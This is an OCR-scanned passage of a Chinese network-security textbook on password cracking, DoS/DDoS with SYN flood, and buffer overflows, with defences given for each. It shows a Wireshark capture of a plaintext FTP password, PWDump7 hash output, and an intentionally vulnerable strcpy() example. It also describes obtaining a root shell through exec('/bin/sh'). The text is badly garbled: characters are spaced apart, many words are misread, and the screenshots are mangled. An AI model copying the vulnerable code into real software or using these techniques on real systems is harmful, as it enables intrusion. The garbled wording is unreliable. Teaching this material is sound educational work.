于 内 部 ,该 类 攻击 的 特点 是 : 攻击 发 生 在 应 用 层 ,面向 信息 ,主要 目的 是 自 改 和 窃取 信息 ,这 
不 会 留 下 明显 的 痕迹 。 

从 攻击 和 安全 的 类 型 分 析 , 可 得 出 一 个 重要 结论 : 一 个 完整 的 网 络 安全 解决 方案 不 仅 
能 防止 系统 型 攻击 ,也 能 阻止 数据 型 攻击 ; 既 能 解决 系统 安全 ,又 能 解决 数据 安全 两 方面 的 
问题 。 

综 上 所 述 ,我 们 很 难 确定 攻击 和 入 侵 的 界线 ,也 很 难 区 分 远程 攻击 和 本 地 攻击 ,这 里 更 
难以 将 所 有 攻击 手段 罗列 齐全 。 下 面 将 介绍 黑客 如 何 利 用 安全 漏洞 实现 攻击 的 常见 手段 和 
防御 措施 。 


3.3 网 络 攻 击 


3.3.1 口令 攻击 与 防御 


口令 攻击 是 指 黑客 以 口令 为 攻击 目标 ,破解 合法 用 户 的 口令 ,或 避 开 口令 验证 过 程 , 然 
后 冒充 合法 用 户 潜入 目标 系统 ,夺取 目标 系统 控制 权 的 过 程 。 如 果 这 个 用 户 有 域 管理 员 或 
root 用 户 权限 ,黑客 就 能 访问 到 用 户 能 访问 到 的 任何 资源 ,这 是 极其 危险 的 。 

进行 口令 攻击 的 前 提 是 必须 先 得 到 该 主机 上 的 某 个 合法 用 户 的 账号 。 获 得 普通 用 户 账 
号 的 方法 很 简单 ,利用 目标 主机 的 Finger 功能 查询 使 用 者 的 信息 ,或 从 电子 邮件 地 址 收集 
目标 主机 的 账号 ,因为 很 多 用 户 会 使 用 一 些 习 惯性 账号 ,造成 账号 的 泄露 。 

1. 口令 攻击 常用 手段 

口令 攻击 常用 的 手段 有 社会 工程 学 、 网 络 嗅 探 \ 口 令 破 解 等 。 

CD 社会 工程 学 。 社 会 工程 学 (Social Engineering) 是 通过 人 际 交 往 这 一 非 技 术 手 段 欺 
骗 的 方法 来 获得 口令 。 例 如 “钓鱼 ”网 站 吸引 用 户 注 册 , 粗 心 者 往往 会 泄露 或 重复 使 用 自己 
的 用 户 名 和 口令 。 

(2) 网 络 嗅 探 。 网 络 嗅 探 就 是 监听 者 (如 wireshark) 可 以 采用 中 途 截击 的 方法 获取 用 
户 的 账号 和 口令 ,这 类 方法 有 一 定 的 局 限 性 ,但 是 危害 极 大 。 当 前 ,很 多 协议 根本 就 没有 采 
取 任 何 加 密 或 身份 认证 技术 ,如 Telnet, FTP, HTTP, SMTP 等 传输 协议 ,用户 账号 和 口令 
信息 都 是 以 明文 格式 传输 的 ,此 时 若 攻击 者 利用 数据 包 截取 工具 可 以 很 轻松 地 收集 到 用 户 
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的 账号 和 口令 。wireshark 截取 到 FTP 服务 的 账号 administrator 和 口令 china, 如 图 3-10 
第 163.166 行 所 示 。 







Capturing from Intel(R) PRO/100 VE Network Connection — [Wireshark 1. 
Hide Edit Yiee Ge Capture Mnalyre Statistics Telopheny Jools Internals Help 
Bwaga BaxcaátecsoriíEBS aaam 
Filter: [ftp gE|Expresrien.. Clear ins 


se. Tine Source Destination Moser Length ef 4 















.0 (SVN Rev 35637 from /trunk)] 








141 LOY B23538 192. 168, I. LOL 192. 168. 1. IUU VU Request USER anonymous 
142 109.823590192.168.1.100 192.168.1.101 FTP 126 Response: 331 anonymous access allowed, send identity (e 
143 109.825041 192.168.1.101 192.168.1.100 FTP 68 Request: PASS IEUser@ 

144 109, 826061 192.168.1.100 192.168.1.101 87 Response: 530 User IEUser@ cannot log in, 


192.168.1.101 





162:127z1 75173 192:100:1:100 













192.1: Ol 1 Password required for administrator. 
166 127.429483 192.168.1.101 192.168.1.100 FTP 66 Request: PASS china 
167 127.476694 192.168.1.100 192.168.1.101 FTP 89 Response: 230 User administrator logged in. 


168 127.478920192.168.1.101 192.168.1.100 FTP 68 Reque: rom utf8 on 
169 127.479074 192.168.1.100 192.168.1.101 FTP 98 Resi "OPTS utf8 on': command not understood — ] 













Frame 163: 74 bytes on wire (592 bits), 74 bytes captured (592 bits) 
& Ethernet II, Src: GemtekTe c9:c0:98 (00:26:82:c9:c0:98), Dst: IntelCor 85:1f:b7 (00:13:20:85:1f:b7) 
& Internet Protocol, src: 192.168.1.101 (192.168.1.101), Dst: 192.168.1.100 (192.168.1.100) 
& Transmission control Protocol, src Port: boinc-client (1043), ost Port: ftp (21), Seg: 1, Ack: 28, Len: 20 
& File Transfer Protocol (FTP) 
USER administratorirn 
Request command: USER 
Request arg: administrator 








o000 00 13 20 85 1f b7 00 26 82 c9 cO 98 08 00 45 00 
0010 00 3c 00 70 40 00 40 06 bé 32 cO a8 Ol 65 cO a8 
0020 01 64 04 13 00 15 37 67 af e4 cf 9c c6 28 50 18 


fa e9 6a c2 00 Q0 55 53 45 $2 20 
° HNENLECESELESEGE o° o 


























330 截取 的 账号 和 口令 


(3) 口令 破解 。 口 令 破解 可 以 分 为 在 线 破解 和 离线 破解 两 种 方式 。 在 线 破解 就 是 用 程 
序 自动 生成 口令 组 合 ,自动 重复 尝试 登录 被 攻击 主机 或 系统 。 这 种 方法 可 以 用 设置 重复 登 
录 次 数 限 制 或 在 Internet 上 普遍 采用 的 登录 时 要 求 输入 验证 的 方法 加 以 防范 。 离 线 破解 需 
要 先 访 问 到 保存 口令 信息 的 文件 或 数据 库 , 再 获取 用 户 的 账户 名 (如 电子 邮件 @ 前 面 的 部 
分 ) 利 用 一 些 专门 软件 强行 破解 用 户口 令 ,这 种 方法 不 受 网 段 限制 ,但 攻击 时 要 有 足够 耐心 。 

离线 破解 通常 有 字典 攻击 和 穷 举 攻击 两 种 方式 。 

(D 字典 攻击 。 攻 击 者 对 所 有 英文 单词 进行 尝试 ,程序 将 按 序 取 出 一 个 又 一 个 的 单词 ， 
进行 一 次 又 一 次 尝试 ,直到 成 功 。 对 于 一 个 有 8 万 个 英文 单词 的 集合 来 说 ,入 侵 者 不 到 一 分 
钟 就 可 以 试 完 。 如 果 用 户 的 口令 不 太 长 或 是 用 单词 ,那么 很 快 就 会 被 破译 出 来 。 

© 穷 举 攻击 。 如 果 字 典 攻击 不 能 成 功 ,攻击 者 可 以 采取 穷 举 攻击 。 一 般 从 长 度 为 1 的 
口令 开始 , 按 长 度 递增 进行 尝试 攻击 。 由 于 人 们 偏爱 简单 易 记 的 口令 ,因此 穷 举 攻击 的 成 功 
率 高 。 如 果 每 0. 001s 检查 一 个 口令 ,那么 86% 的 口令 可 以 在 一 周 内 破译 。 

O 组 合 攻 击 。 这 种 方法 结合 字典 攻击 和 穷 举 攻击 的 特点 , 先 字 典 攻击 , 青 进行 海量 连 
续 测试 口令 的 方法 进行 穷 举 攻击 。 

LC5(LOphtcrack) 是 一 个 Windows 2000 口令 审计 工具 ,能 根据 操作 系统 中 存储 的 加 密 
喻 希 计算 Windows 2000 口令 ,其 功能 强大 、 丰 富 。 它 有 3 种 方式 破解 口令 , 即 词典 攻击 、 穷 
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举 攻 击 和 组 合 攻 击 。 

PWDump7 不 是 一 个 口令 破解 程序 , 它 能 从 SAM 数据 库 中 提取 口令 喻 希 (Hash) 如 
图 3-11 所 示 ,而 LC5 不 能 提取 口令 哈 希 。Windows 2000 使 用 了 SYSkey 对 口令 进行 更 强 
的 加 密 ,LC5 要 在 Windows 2000 下 提取 口令 哈 希 ,必须 使 用 PWDump7。 








IC: spudunp>pudunp? 

[Pudunp v7.1 - rau passuord extractor 
Author: Andres Ta: Acuna 

url: http://wuw.514.es 


rator:500:NO PRSSUORDs*ww*wweexoeses: 31 D6 CFE0D16ñE931B73C59D7E0C808| 


1 :NO PASSWORD ee 34 D6 CFE0D160F931B73CS59D7EBCB89CI 
ant :1090: 48CD1C8ECD870D7F5378F85B88781718 : 9 DCRE70C9 4831 DECCRE37FCABBE3 


8945a8:1892:N0 PASSWORD enren: EB3932060B3E136159209 E29F| 


IC: Npudump? 














图 3-11 PWDump? 提取 目标 主机 口令 哈 希 


2. 口令 攻击 的 防范 

防范 的 办 法 很 简单 ,只 要 使 自己 的 口令 不 在 英语 字典 中 , 且 不 可 能 被 别人 猜 出 就 可 以 
了 。 一 个 好 的 口令 应 当 至 少 有 7 个 字符 长 ,不 用 个 人 信息 (如 生日 .名字 等 ) ,口令 中 要 有 
些 非 字母 (如 数字 ,标点 符号 .控制 字符 等 ) ,不 能 写 在 纸 上 或 计算 机 的 文件 中 ,选择 口令 的 一 
个 好 方法 是 将 两 个 不 相关 的 词 用 一 个 数字 或 控制 字符 相连 ,并 截断 为 8 个 字符 ,如 口令 可 以 
是 me2. hk97。 

保持 口令 安全 的 要 点 如 下 : 不 要 将 口令 写 下 来 ; 不 要 将 口令 保存 在 计算 机 文件 中 ; 不 
要 选取 显而易见 的 信息 作 口令 ; 不 要 让 别人 知道 ; 不 要 在 不 同系 统 上 使 用 同一 口令 ; 定期 
改变 口令 ,至 少 6 个 月 要 改变 一 次 。 

3. Windows 口令 破解 程序 

(D) LOphtcrack 是 一 个 Windows 2000 口令 审计 工具 ,能 根据 操作 系统 中 存储 的 加 密 
哈 希 计算 Windows 2000 口令 ,其 功能 非常 强大 ,丰富 ,是 目前 市 场 上 最 好 的 Windows 2000 
口令 破解 程序 之 一 。 它 有 3 种 方式 可 以 破解 口令 , 即 词典 攻击 、 组 合 攻 击 、 强 行 攻击 。 
LOphtcrack 有 一 个 美观 . 易 用 的 GUI, 而 且 利 用 了 Windows 2000 的 两 个 实际 缺陷 ,这 使 得 
LOphterack 的 速度 奇 快 。 

(2) NTSweep 使 用 的 方法 和 其 他 口令 破解 程序 不 同 。 它 不 是 下 载 口令 并 离线 破解 ,而 
是 利用 了 微软 公司 允许 用 户 改变 口令 的 机 制 。NTSweep 首先 取 定 一 个 单词 , NTSweep 使 
用 这 个 单词 作为 账号 的 原始 口令 ,并 试图 把 用 户 的 口令 改 为 同一 个 单词 。 如 果 主 域 控制 机 
器 返回 失败 信息 ,就 可 知道 这 不 是 原来 的 口令 ; 反之 ,如 果 返 回 成 功 信息 ,就 说 明 这 一 定 是 
账号 的 口令 。 因 为 成 功 地 把 口令 改 成 原来 的 值 , 用 户 永远 不 会 知道 口令 曾经 被 人 修改 过 。 

G) PWDump7 不 是 一 个 口令 破解 程序 ,但 是 它 能 用 来 从 SAM 数据 库 中 提取 哈 希 口 
令 。L0phtcrack 已 经 内 建 了 这 个 特征 ,但 PWDump7 还 是 很 有 用 的 。 首 先 , 它 是 一 个 小 型 、 
易 用 的 命令 行 工 具 , 能 提取 哈 希 口令 ; 其 次 ,目前 很 多 情况 下 LOphtcrack 的 版 本 不 能 提取 
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哈 希 口令 。 例 如 ,SYSTEM 是 一 个 能 在 NT 下 运行 的 程序 ,为 SAM 数据 库 提供 了 很 强 的 
加 密 功 能 ,如 果 SYSTEM 在 使 用 ,LOphtcrack 就 无 法 提取 哈 希 口令 ,但 是 PWDump7 还 能 
使 用 ; 而 且 要 想 在 Windows 2000 下 提取 哈 希 口令 , 则 必须 使 用 PWDump7, 因 为 系统 使 用 
了 更 强 的 加 密 模 式 来 保护 信息 。 


3.3.2 拒绝 服务 攻击 


拒绝 服务 攻击 (DoS) 行 动 使 网 站 服务 器 充斥 大 量 要 求 回 复 的 信息 ,消耗 网 络 带宽 或 系 
统 资源 ,导致 网 络 或 系统 不 胜 负荷 直至 瘫痪 而 停止 正常 的 网 络 服务 。 

1. 拒绝 服务 攻防 概述 

“拒绝 服务 "的 一 种 攻击 方式 为 : 传送 众多 要 求 确认 的 信息 到 服务 器 ,使 服务 器 里 充斥 
着 这 种 无 用 的 信息 。 所 有 的 信息 都 有 需要 回复 的 虚假 地 址 ,以 至 于 当 服 务 器 试图 回 传 时 , 却 
无 法 找到 用 户 。 服 务 器 于 是 暂时 等 候 , 有 时 要 超过 lmin, 然 后 再 切断 连接 。 服 务 器 切断 连 
接 时 ,黑客 再 度 传送 新 一 批 需 要 确认 的 信息 ,这 个 过 程 周而复始 ,最 终 导致 服务 器 瘫痪 。 

最 常 遭受 拒绝 服务 攻击 的 目标 包括 路 由 器 、 数 据 库 、Web 服务 器 .FTP 服务 器 以 及 与 协 
议 相 关 的 网 络 服 务 ( 如 DNS, WINS 和 SMB)。 

2. 拒绝 服务 模式 分 类 

拒绝 服务 攻击 有 很 多 种 分 类 方法 ,按照 人 侵 方式 ,拒绝 服务 可 以 分 为 资源 消耗 型 DoS 
攻击 ,配置 修改 型 DoS 攻击 ,物理 破坏 型 DoS 攻击 和 服务 利用 型 DoS 攻击 。 

COD 资源 消耗 型 DoS 攻击 。 资 源 消耗 型 拒绝 服务 是 指 入 侵 者 试图 消耗 目标 的 合法 资 
源 , 如 网 络 带宽 内存、 硬盘 空间 和 CPU 利用 率 , 从 而 得 到 拒绝 服务 的 目的 。 

(2) 配置 修改 型 DoS 攻击 。 计 算 机 配置 不 当 可 能 造成 系统 运行 不 正常 甚至 根本 不 能 运 
行 。 入 侵 者 通过 修改 或 者 破坏 系统 的 配置 信息 来 阻止 其 他 合法 用 户 使 用 计算 机 和 网 络 提供 
的 服务 ,主要 有 改变 路 由 信息 ,修改 Windows 注册 表 、 修 改 Linux 的 各 种 配置 文件 等 几 种 。 

(3) 物理 破坏 型 DoS 攻击 。 物 理 破坏 型 拒绝 服务 主要 针对 物理 设备 的 安全 ,入 侵 者 可 
以 通过 破坏 或 改变 网 络 部 件 以 实现 拒绝 服务 。 

CD. 服务 利用 型 DoS 攻击 。 利 用 入 侵 目 标的 自身 资源 实现 人 侵 意 图 ,由 于 被 人 侵 系 统 
具有 漏洞 和 通信 协议 的 弱点 ,这 给 入 侵 者 提供 了 机 会 。 入 侵 者 利用 TCP/IP 及 目标 责任 系 
统 自身 应 用 软件 中 的 一 些 漏洞 和 弱点 得 到 拒绝 服务 的 目的 。 例 如 ,投入 使 用 的 Web 服务 器 
有 这 样 一 个 错误 : 当 出 现 特定 的 错误 时 会 显示 一 个 消息 框 ,黑客 可 以 利用 这 一 缺陷 向 用 户 
的 计算 机 发 送 数目 较 少 的 请 求 ,使 该 消息 框 显示 出 来 。 这 会 锁定 所 有 的 线程 请 求 ,因此 有 效 
阻止 了 其 他 人 的 访问 请 求 。 在 TCP/IP 堆栈 中 存在 很 多 漏洞 ,如 允许 碎片 包 、 大 数据 包 、IP 
路 由 选择 、 半 公开 TCP 连接 和 数据 包 Flood 等 都 能 使 系统 崩溃 。 

3. 分 布 式 拒绝 服务 攻击 

分 布 式 拒绝 服务 攻击 (Distributed DoS, DDoS) 是 目前 黑客 经 常 采 用 而 难以 防范 的 攻击 
手段 。 这 里 着 重 描述 黑客 是 如 何 组 织 并 发 起 DDoS 攻击 的 ,并 结合 其 中 的 Syn Flood 实例 ， 
使 读者 可 以 对 DDoS 攻击 有 一 个 更 形象 的 了 解 。 

(1) DDoS 攻击 概念 。 最 基本 的 DoS 攻击 就 是 利用 合理 的 服务 请 求 来 占用 过 多 的 服务 
资源 ,从 而 使 合法 用 户 无 法 得 到 服务 响应 。DDoS 攻击 手段 是 在 传统 的 DoS 攻击 基础 之 上 
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产生 的 一 类 攻击 方式 。 单 一 的 DoS 攻击 一 般 是 采用 一 对 一 方式 的 , 当 攻 击 目 标 CPU 速度 
低 、 内 存 小 或 者 网 络 带 宽 小 等 各 项 性 能 指标 不 高 时 它 的 效果 是 明显 的 。 随 着 计算 机 与 网 络 
技术 的 发 展 ,计算 机 的 处 理 能 力 迅速 增长 ,内 存 大 大 增加 ,同时 也 出 现 了 千 光 级别 的 网 络 , 这 
使 得 DoS 攻击 的 困难 程度 加 大 了 。 例 如 ,目标 对 恶意 攻击 包 的 “消化 能 力 ” 加 强 了 不 少 , 攻 
击 软件 每 秒 钟 可 以 发 送 3000 个 攻击 包 , 但 用 户 的 主机 与 网 络 带宽 每 秒 钟 可 以 处 理 10 000 个 
攻击 包 , 这 样 一 来 攻击 就 不 会 产生 什么 效果 。 

当 理解 了 DoS 攻击 ,其 原理 就 很 简单 了 。 如 果 说 计算 机 与 网 络 的 处 理 能 力 加 大 了 10 倍 ， 
用 一 台 攻 击 机 来 攻击 不 再 能 起 作用 的 话 ,攻击 者 使 用 10 台 攻 击 机 同时 攻击 呢 ? 用 100 6 
WE? DDoS 就 是 利用 更 多 的 佛 偶 机 (肉鸡 ) 来 发 起 进攻 ,采用 比 从 前 更 大 的 规模 来 进攻 受害 者 。 

高 速 广泛 连接 的 网 络 给 大 家 带 来 了 方便 ,也 为 DDoS 攻击 创造 了 极为 有 利 的 条 件 。 这 
使 得 攻击 可 以 从 更 远 的 地 方 或 者 其 他 城市 发 起 ,攻击 者 的 倪 偶 机 位 置 可 以 分 布 在 更 大 的 范 
围 ,选择 起 来 更 灵活 了 。 这 时 分 布 式 的 拒绝 服务 攻击 手段 (DDoS) 就 应 运 而 生 了 。 

(2) 被 DDoS 攻击 时 的 现象 。 被 攻击 主机 上 有 大 量 等 待 的 TCP 连接 ,网 络 中 充斥 着 大 
量 的 无 用 数据 包 , 源 地 址 为 假 , 制 造 高 流量 无 用 数据 ,造成 网 络 拥塞 ,使 受害 主机 无 法 正常 和 
外 界 通信 ,利用 受害 主机 提供 的 服务 或 传输 协议 上 的 缺陷 ,反复 、 高 速 地 发 出 特定 的 服务 请 
求 ,使 受害 主机 无 法 及 时 处 理 所 有 正常 请 求 ,严重 时 会 造成 系统 死机 。 

(3) DDoS 攻击 运行 原理 。 如 图 3-12 所 示 ,一 个 比较 完善 的 DDoS 攻击 体系 分 成 四 大 
部 分 , 先 来 看 一 下 最 重要 的 第 2 和 第 3 部 分 : 它们 分 别 用 作 控 制 和 实际 发 起 攻击 。 请 注意 
控制 机 与 攻击 机 的 区 别 , 对 第 4 部 分 的 受害 者 来 说 ,DDoS 的 实际 攻击 包 是 从 第 3 部 分 攻击 
倪 偶 机 上 发 出 的 ,第 2 部 分 的 控制 机 只 发 布 命令 而 不 参与 实际 的 攻击 。 对 第 2 和 第 3 部 分 
计算 机 ,黑客 有 控制 权 或 者 是 部 分 的 控制 权 , 并 把 相应 的 DDoS 程序 上 传 到 这 些 平台 上 ,这 
些 程 序 与 正常 的 程序 一 样 运行 并 等 待 来 自 黑 客 的 指令 ,通常 它 还 会 利用 各 种 手段 隐藏 自己 
而 不 易 被 别人 发 现 。 在 平时 ,这 些 倪 偶 机 器 并 没有 什么 异常 ,只 是 一 旦 黑客 连接 到 它们 进行 
控制 ,并 发 出 指令 的 时 候 ,' 攻 击 倪 偶 机 就 成 为 害 人 者 去 发 起 攻击 了 。 
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图 3-12 DDoS 攻击 
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为 什么 黑客 不 直接 去 控制 攻击 佛 偶 机 ,而 要 从 控制 侧 偶 机 上 转 一 下 呢 ? 这 就 是 DDoS 
攻击 难以 追查 的 原因 之 一 。 作 为 攻击 者 ,肯定 不 愿意 被 捉 到 ,而 攻击 者 使 用 的 倪 偶 机 越 多 ， 
他 实际 上 提供 给 受害 者 的 分 析 依 据 就 越 多 。 在 占领 一 台 机 器 后 ,高 水 平 的 攻击 者 会 首先 做 
两 件 事 , 即 考虑 如 何 留 好 后 门 、 如 何 清 理 日 志 。 这 就 是 擦 掉 脚 印 , 不 让 自己 做 的 事 被 别人 察 
觉 到 。 

但 是 在 第 3 部 分 攻击 倪 偶 机 上 清理 日 志 是 一 项 庞大 的 工程 ,即使 有 很 好 的 日 志清 理工 
具 的 帮助 ,黑客 对 这 个 任务 也 很 头痛 。 这 就 导致 了 有 些 攻击 机 隐蔽 得 不 干净 ,通过 它 上 面 的 
线索 找到 了 控制 它 的 上 一 级 计算 机 ,上 级 的 计算 机 如 果 是 黑客 自己 的 机 器 ,那么 他 就 会 被 找 
出 来 了 。 但 如 果 这 是 控制 用 的 倪 偶 机 的 话 , 黑 客 自 身 还 是 安全 的 。 控 制 便 偶 机 的 数目 相对 
很 少 , 一 般 一 台 就 可 以 控制 几 十 台 攻 击 机 ,清理 一 台 计 算 机 的 日 志 对 黑客 来 讲 就 轻松 多 了 ， 
这 样 从 控制 机 再 找到 黑客 的 可 能 性 也 大 大 降低 。 

4. DDoS 攻击 的 防范 

到 目前 为 止 ,进行 DDoS 攻击 的 防御 还 是 比较 困难 的 。 首 先 ,这 种 攻击 的 特点 是 它 利 用 
f TCP/IP 协议 的 漏洞 。 一 位 资深 的 安全 专家 给 了 个 形象 的 比喻 : DDoS RRA 1000 个 人 
同时 给 你 家 里 打 电 话 ,这 时 候 你 的 朋友 还 打 得 进来 吗 ? 

网 管 员 作为 一 个 企业 内 部 网 的 管理 者 ,在 他 维护 的 网 络 中 有 一 些 服务 器 需要 向 外 提供 
WWW 服务 ,因而 不 可 避免 地 成 为 DDoS 的 攻击 目标 ,该 如 何 做 呢 ? 可 以 从 主机 与 网 络 设 
备 两 个 角度 去 考虑 。 

(1) 主机 上 的 设置 。 几 乎 所 有 的 主机 平台 都 有 抵御 DoS 的 设置 ,基本 分 为 以 下 几 种 情 
Bb. 关闭 不 必要 的 服务 ; 限制 同时 打开 的 Syn 半 连 接 数目 ; 缩短 Syn 半 连 接 的 暂停 时 间 ; 
及 时 更 新 系统 补丁 。 

(2) 网 络 设备 上 的 设置 。 企 业 网 的 网 络 设备 可 以 从 防火 墙 与 路 由 器 上 考虑 。 这 两 个 设 
备 是 到 外 界 的 接口 设备 ,在 进行 防 DDoS 设置 的 同时 ,要 注意 以 多 大 的 效率 牺牲 为 代价 ,这 
对 你 来 说 是 否 值得 。 

(3) 防火 墙 。 禁 止 对 主机 的 非 开放 服务 的 访问 ; 限制 同时 打开 的 SYN 最 大 连接 数 ; 限 
制 特定 IP 地 址 的 访问 ; 启用 防火 墙 的 防 DDoS 的 属性 ; 严格 限制 对 外 开放 的 服务 器 的 向 外 
访问 。 

(4) 路 由 器 。 以 Cisco 路 由 器 为 例 ,Cisco 快速 转发 ; 使 用 单 播 反 向 路 径 ; 访问 控制 列 
表 (ACL) 过 滤 ; 设置 SYN 数据 包 流量 速率 ; 升级 版 本 过 低 的 ISO; 为 路 由 器 建立 日 志 服 
务 器 。 

5. 应 用 案例 

SYN Flood 是 目前 最 流行 的 DDoS 攻击 手段 ,早先 的 DoS 手段 在 向 分 布 式 这 一 阶段 发 
展 的 时 候 也 经 历 了 浪 里 淘 沙 的 过 程 。SYN Flood 的 攻击 效果 最 好 ,这 应 该 是 众 黑客 不 约 而 
同 选择 它 的 原因 。 

(OD TCP 连接 的 三 次 握手 协议 。SYN Flood 利用 了 TCP/IP 协议 的 固有 漏洞 。 面 向 连 
接 的 TCP 三 次 握手 是 SYN Flood 存在 的 基础 。TCP 连接 的 三 次 握手 过 程 如 图 3-13 所 示 。 
在 第 一 步 中 ,客户 端 向 服务 端 提 出 连接 请 求 , 这 时 TCP SYN 标志 置 位 。 客 户 端 告诉 服务 端 
序列 号 区 域 合法 ,需要 检查 。 客 户 端 在 TCP 报头 的 序列 号 区 中 插入 自己 的 ISN。 第 二 步 ， 
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服务 端 收 到 该 TCP 分 段 后 ,以 自己 的 ISN 回应 (SYN 标志 置 位 ), 同 时 确认 收 到 客户 端的 第 
一 个 TCP 分 段 (ACK 标志 置 位 ) 。 在 第 三 步 中 ,客户 端 确认 收 到 服务 端的 ISN( ACK 标志 
置 位 )。 至 此 已 建立 完整 的 TCP 连接 ,开始 全 双 工 模式 的 数据 传输 过 程 。 

(2) SYN Flood 攻击 者 对 三 次 握手 的 利用 。 如 图 3-14 所 示 ,假设 一 个 用 户 向 服务 器 发 
送 了 SYN 报 文 后 突然 死机 或 掉 线 ,那么 服务 器 在 发 出 SYN+ ACK 应 答 报 文 后 是 无 法 收 到 
客户 端的 ACK 报 文 的 (第 三 次 握手 无 法 完成 ) ,这 种 情况 下 服务 器 端 会 再 次 发 送 SYN + 
ACK 给 客户 端 , 并 等 待 一 段 时 间 后 丢弃 这 个 未 完成 的 连接 ,这 段 时 间 的 长 度 称 为 SYN 暂 
停 。 一 般 来 说 ,这 个 时 间 是 分 钟 的 数量 级 (大 约 为 0.5 一 2min); 一 个 用 户 出 现 异常 导致 服 
务 器 的 一 个 线程 等 待 Imin 并 不 是 什么 很 大 的 问题 ,但 如 果 有 一 个 恶意 的 攻击 者 大 量 模拟 
这 种 情况 ,服务 器 端 将 为 了 维护 一 个 非常 大 的 半 连 接 列 表 而 消耗 非常 多 的 资源 一 一 数 以 万 
计 的 半 连 接 , 即 使 是 简单 的 保存 并 遍历 也 会 消耗 非常 多 的 CPU 时 间 和 内 存 , 何 况 还 要 不 断 
对 这 个 列表 中 的 IP 进行 SYN 十 ACK 的 重 试 。 如 果 服 务 器 的 TCP/IP 栈 不 够 强大 ,最 后 的 
结果 是 堆栈 溢出 崩溃 ,即使 服务 器 端的 系统 足够 强大 ,服务 器 端 也 将 忙于 处 理 攻 击 者 伪造 的 
TCP 连接 请 求 而 无 暇 理 皮 客 户 的 正常 请 求 , 此 时 从 正常 客户 的 角度 看 来 ,服务 器 失去 响应 ， 
这 种 情况 称 为 服务 器 端 受到 了 SYN Flood 攻击 (SYN 洪水 攻击 )。 
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图 3-13 TCP 三 次 握手 图 3-14 SYN Flood 恶意 地 不 完成 三 次 握手 


3.3.3 缓冲 区 溢出 攻击 


缓冲 区 溢出 是 一 种 非常 普遍 ,非常 危险 的 漏洞 ,在 各 种 操作 系统 .应 用 软件 中 广泛 存在 。 
利用 缓冲 区 溢出 攻击 ,可 以 导致 程序 运行 失败 、 系 统 宕 机 、 重 新 启动 等 后 果 。 更 为 严重 的 是 ， 
可 以 利用 它 执行 非 授权 指令 ,甚至 可 以 取得 系统 特权 ,进而 进行 各 种 非法 操作 。 缓 冲 区 溢出 
攻击 有 多 种 英文 名 称 , 如 buffer overflow, buffer overrun, smash the stack,trash the stack, 


scribble the stack .mangle the stack, memory leak,overrun screw, 

1. 缓冲 区 溢出 的 原理 

通过 往 程 序 的 缓冲 区 写 超出 其 长 度 的 内 容 , 造 成 缓冲 区 的 溢出 ,从 而 破坏 程序 的 堆栈 ， 
使 程序 转 而 执行 其 他 指令 ,以 达到 攻击 的 目的 。 造 成 缓冲 区 溢出 的 原因 是 程序 中 没有 仔细 
检查 用 户 输入 的 参数 。 例 如 ,下 面 程序 : 


void function(char * str) 
{ 

char buffer[16]; 
strcpy(buffer,str); 

} 
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上 面 的 strcpy() 将 直接 把 str 中 的 内 容 复 制 到 buffer 中 。 这 样 只 要 ste 的 长 度 大 于 16. 
就 会 造成 buffer 的 溢出 ,使 程序 运行 出 错 。 存 在 像 strcpy 这 样 问题 的 标准 函数 还 有 strcat()、 
sprintf() ,vsprintf O .gets().scanf() £, 

当然 ,随便 往 缓冲 区 中 填 东 西 造成 它 溢出 一 般 只 会 出 现 * 分 段 错误 ”(Segmentation 
Fault) ,而 不 能 达到 攻击 的 目的 。 最 常见 的 手段 是 通过 制造 缓冲 区 溢出 使 程序 运行 一 个 用 
户 shell ,再 通过 shell 执行 其 他 命令 。 如 果 该 程序 属于 root HA suid 权限 的 话 ,攻击 者 就 
获得 了 一 个 有 root 权限 的 shell, 可 以 对 系统 进行 任意 操作 了 。 

缓冲 区 溢出 成 为 远程 攻击 的 主要 手段 ,其 原因 在 于 缓冲 区 溢出 漏洞 给 予 了 攻击 者 他 所 
想 要 的 一 切 : 植 入 并 且 执 行 攻击 代码 。 被 植 入 的 攻击 代码 以 一 定 的 权限 运行 有 缓冲 区 溢出 
漏洞 的 程序 ,从 而 得 到 被 攻击 主机 的 控制 权 。 

2. 缓冲 区 溢出 的 漏洞 和 攻击 

缓冲 区 溢出 攻击 的 目的 在 于 扰乱 具有 某 些 特权 运行 的 程序 的 功能 ,这 样 可 以 使 得 攻击 
者 取得 程序 的 控制 权 , 如 果 该 程序 具有 足够 的 权限 ,那么 整个 主机 就 被 控制 了 。 一 般 而 言 ， 
攻击 者 攻击 root 程序 ,然后 执行 类 似 “exec(sh) ”的 代码 来 获得 root 权限 的 shell。 为 了 达到 
这 个 目的 ,攻击 者 必须 达到 以 下 两 个 目标 : 在 程序 的 地 址 空间 里 安排 适当 的 代码 ; 通过 适 
当 的 初始 化 寄存 器 和 内 存 , 让 程序 跳 转 到 入 侵 者 安排 的 地 址 空间 执行 。 

根据 这 两 个 目标 来 对 缓冲 区 溢出 攻击 进行 分 类 。 

(1) 在 程序 的 地 址 空间 里 安排 适当 的 代码 。 在 程序 的 地 址 空间 里 安排 适当 的 代码 有 两 
种 方法 : 植 入 法 ; 利用 已 经 存在 的 代码 。 

CD 植 和 法。 攻击 者 向 被 攻击 的 程序 输入 一 个 字符 串 ,程序 会 把 这 个 字符 串 放 到 缓冲 区 
里 。 这 个 字符 串 包含 的 资料 是 可 以 在 这 个 被 攻击 的 硬件 平台 上 运行 的 指令 序列 。 在 这 里 ， 
攻击 者 用 被 攻击 程序 的 缓冲 区 来 存放 攻击 代码 。 缓 冲 区 可 以 设 在 任何 地 方 , 如 堆栈 (Stack， 
自动 变量 ). 堆 (Heap ,动态 分 配 的 内 存 区 ) 和 静态 资料 区 。 

© 利用 已 经 存在 的 代码 。 有 时 ,攻击 者 想 要 的 代码 已 经 在 被 攻击 的 程序 中 了 ,攻击 者 
所 要 做 的 只 是 对 代码 传递 一 些 参 数 而 已 。 例 如 ,攻击 代码 要 求 执行 *exec(*/bin/sh”)”, 而 
在 libe 库 中 的 代码 执行 “exec(Carg)”, 其 中 arg 是 一 个 指向 一 个 字符 串 的 指针 参数 ,那么 攻 
击 者 只 要 把 传人 的 参数 指针 改 为 指向 /bin/sh” 即 可 。 

(2) 通过 适当 的 初始 化 寄存 器 和 内 存 , 让 程序 跳 转 到 入 侵 者 安排 的 地 址 空间 执行 。 介 
绍 攻 击 者 如 何 使 一 个 程序 的 缓冲 区 溢出 ,并 且 执行 转移 到 攻击 代码 (这 个 就 是 “溢出 的 由 
